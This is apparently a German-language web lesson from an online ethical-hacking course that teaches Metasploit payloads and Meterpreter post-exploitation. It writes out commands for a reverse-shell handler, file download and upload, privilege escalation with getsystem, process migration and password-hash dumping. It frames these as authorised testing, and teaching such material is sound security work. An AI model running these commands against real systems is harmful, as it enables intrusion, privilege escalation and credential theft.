Payloads und Meterpreter
Shell nach der Ausnutzung
Payloads und Meterpreter ist eine kostenlose Ethical Hacking Academy-Lektion auf CoddyKit. Dies ist Lektion 3 von 4. Du kannst die komplette Lektion unten kostenlos lesen – dann übst du sie direkt im Browser mit einem integrierten Code-Editor und einem KI-Tutor rund um die Uhr. Sie ist Teil des Ethical Hacking Academy-Lernpfads, und dein Fortschritt wird über Web und CoddyKit-App synchronisiert. Der Ethical Hacking Academy-Kurs umfasst insgesamt 4 Lektionen.
Was ist ein Payload?
Ein Payload ist der Code, der nach einem erfolgreichen Exploit auf dem Ziel ausgeführt wird. Er legt fest, was Sie anschließend tun können – vom Ausführen eines einzelnen Befehls bis zum Öffnen einer vollständig interaktiven Shell.
Die Wahl des richtigen Payloads hängt vom Betriebssystem des Ziels, der Netzwerkkonfiguration und dem benötigten Zugriffsumfang ab.
Staged und Stageless
Payloads werden auf zwei Arten übertragen:
- Staged (achten Sie auf das
/inmeterpreter/reverse_tcp): Zuerst wird ein kleiner Stub gesendet, der anschließend den vollständigen Payload herunterlädt. Dadurch ist die anfängliche Dateigröße kleiner. - Stageless (achten Sie auf das
_inmeterpreter_reverse_tcp): Der vollständige Payload wird auf einmal übertragen. Das ist bei instabilen Netzwerken zuverlässiger.
Bind- und Reverse-Shells
Es gibt zwei Verbindungsrichtungen:
- Bind-Shell: Das Ziel öffnet einen Port und wartet; Sie verbinden sich mit diesem Port. Firewalls blockieren dies häufig.
- Reverse-Shell: Das Ziel verbindet sich zurück zu Ihnen (LHOST/LPORT). Dies passiert normalerweise auch bei Firewalls, die ausgehende Verbindungen zulassen.
Aus diesem Grund sind Reverse-Payloads meist die Standardeinstellung.
Meterpreter kennenlernen
Meterpreter ist der erweiterte Payload von Metasploit. Anders als eine einfache Befehls-Shell läuft er im Arbeitsspeicher, kommuniziert über einen verschlüsselten Kanal und bietet einen umfangreichen Befehlssatz für die Post-Exploitation.
Da er keine Dateien auf die Festplatte schreibt, ist er unauffälliger, als wenn eine separate ausführbare Datei abgelegt wird.
Zentrale Meterpreter-Befehle
Sobald Sie eine Meterpreter-Session haben, helfen grundlegende Befehle dabei, sich auf dem Zielsystem zu orientieren.
sysinfo # OS, architecture, hostname
getuid # current user context
ps # running processes
pwd ls cd # filesystem navigationDateiübertragung
Mit einfachen Befehlen überträgt Meterpreter Dateien zwischen Ihrem Computer und dem Ziel. Das ist nützlich, um Beweismittel zu sammeln oder bei autorisierten Tests Tools bereitzustellen.
download C:\\Users\\admin\\secret.txt /tmp/
upload /tmp/tool.exe C:\\Windows\\Temp\\In eine System-Shell wechseln
Der Befehl shell wechselt von Meterpreter zum systemeigenen Befehlsinterpreter des Ziels (cmd.exe oder /bin/sh), wenn Sie direkt Befehle auf Betriebssystemebene benötigen.
Geben Sie exit ein, um zur Meterpreter-Eingabeaufforderung zurückzukehren, ohne die Session zu verlieren.
shell
# C:\> whoami
# exit -> back to meterpreterRechteausweitung
Oft erhalten Sie zunächst nur eingeschränkte Berechtigungen. Meterpreter unterstützt Sie bei der Rechteausweitung:
getsystemversucht bekannte Techniken, um unter Windows SYSTEM-Rechte zu erlangen.- Das Post-Modul
local_exploit_suggesterempfiehlt Exploits zur lokalen Rechteausweitung für den Host.
Höhere Berechtigungen ermöglichen das Auslesen von Zugangsdaten und einen umfassenderen Zugriff.
getsystem
run post/multi/recon/local_exploit_suggesterProzesse migrieren
Ihre Session läuft innerhalb eines Prozesses. Wenn dieser Prozess instabil ist oder wahrscheinlich beendet wird, migrieren Sie mit migrate in einen stabileren, langfristig laufenden Prozess, damit Ihre Session bestehen bleibt.
Die Migration in einen Prozess mit derselben Berechtigungsstufe hilft außerdem dabei, sich unauffällig einzufügen, und kann Ihren Benutzerkontext ändern.
ps
migrate 1340 # migrate into a stable PIDZugriff aufrechterhalten
Meterpreter bietet Funktionen zum Erfassen nützlicher Daten während autorisierter Prüfungen, etwa hashdump zum Sammeln von Passwort-Hashes und Keyscan-Tools, um die Auswirkungen der Eingabeerfassung zu demonstrieren.
Verwenden Sie solche Funktionen nur innerhalb des vereinbarten Umfangs und dokumentieren Sie alles für den Kundenbericht.
hashdump
run post/windows/gather/checkvmHandler
Ein Reverse-Payload benötigt auf Ihrer Seite einen lauschenden Dienst, der die Verbindung entgegennimmt. Das Modul multi/handler übernimmt diese Aufgabe. Konfigurieren Sie es mit demselben Payload sowie LHOST und LPORT, die zum Erzeugen des Payloads verwendet wurden.
Das ist unverzichtbar, wenn Sie einen msfvenom-Payload außerhalb der Konsole bereitstellen: Starten Sie zuerst den Handler und lösen Sie anschließend den Payload auf dem Ziel aus.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 4444
exploit -jSchnelltest
Wählen Sie den Payload aus, der eine restriktive Firewall umgehen kann.
Zusammenfassung
Sie haben Payloads und Meterpreter kennengelernt:
- Payloads können staged (/) oder stageless (_) sowie bind oder reverse sein; Reverse-Payloads umgehen Firewalls meist besser.
- Meterpreter läuft über einen verschlüsselten Kanal im Arbeitsspeicher und bietet umfangreiche Befehle.
- Zentrale Aufgaben: sysinfo, getuid, ps, download/upload, shell.
- Erweitern Sie die Rechte mit getsystem und local_exploit_suggester; verwenden Sie migrate für mehr Stabilität.
- Verwenden Sie Funktionen zum Sammeln von Daten nur innerhalb des vereinbarten Umfangs und dokumentieren Sie alles.
Als Nächstes: Post-Exploitation-Module, Pivoting und das Sammeln von Beweismitteln.
Häufig gestellte Fragen
Ist die Lektion „Payloads und Meterpreter“ kostenlos?
Ja — der vollständige Text von „Payloads und Meterpreter“ ist hier im Web kostenlos zu lesen. Um sie interaktiv zu üben (integrierter Code-Editor und 24/7 KI-Tutor) und den Rest des Ethical Hacking Academy-Kurses freizuschalten, upgrade auf CoddyKit PRO. Der Ethical Hacking Academy-Kurs umfasst insgesamt 4 Lektionen.
Was lerne ich in „Payloads und Meterpreter“?
Shell nach der Ausnutzung Du übst Ethical Hacking Academy mit praktischem Code, den du direkt im Browser ausführst, und ein 24/7 KI-Tutor beantwortet deine Fragen während du die Lektion bearbeitest.
Brauche ich Erfahrung, um Ethical Hacking Academy zu starten?
Keine Vorkenntnisse erforderlich. Ethical Hacking Academy auf CoddyKit ist für Anfänger bis fortgeschrittene Lernende strukturiert, sodass du hier starten oder von Anfang an beginnen und in deinem eigenen Tempo voranschreiten kannst. Dies ist Lektion 3 von 4.
Wie lange dauert die Lektion „Payloads und Meterpreter“?
Die meisten CoddyKit-Lektionen dauern etwa 5–10 Minuten. Jede ist kompakt und interaktiv, sodass du stetig Fortschritte machst und genau dort weitermachst, wo du aufgehört hast – im Web und in der App.
Kann ich in dieser Ethical Hacking Academy-Lektion Code schreiben und ausführen?
Ja. Jede Ethical Hacking Academy-Lektion enthält einen integrierten Code-Editor, sodass du echten Code direkt in deinem Browser schreibst und ausführst und sofort KI-Feedback erhältst — ohne lokale Einrichtung erforderlich.
Alle Lektionen in diesem Kurs
- Metasploit-Architektur
- Exploits suchen und verwenden
- Payloads und Meterpreter
- Post-Exploitation-Module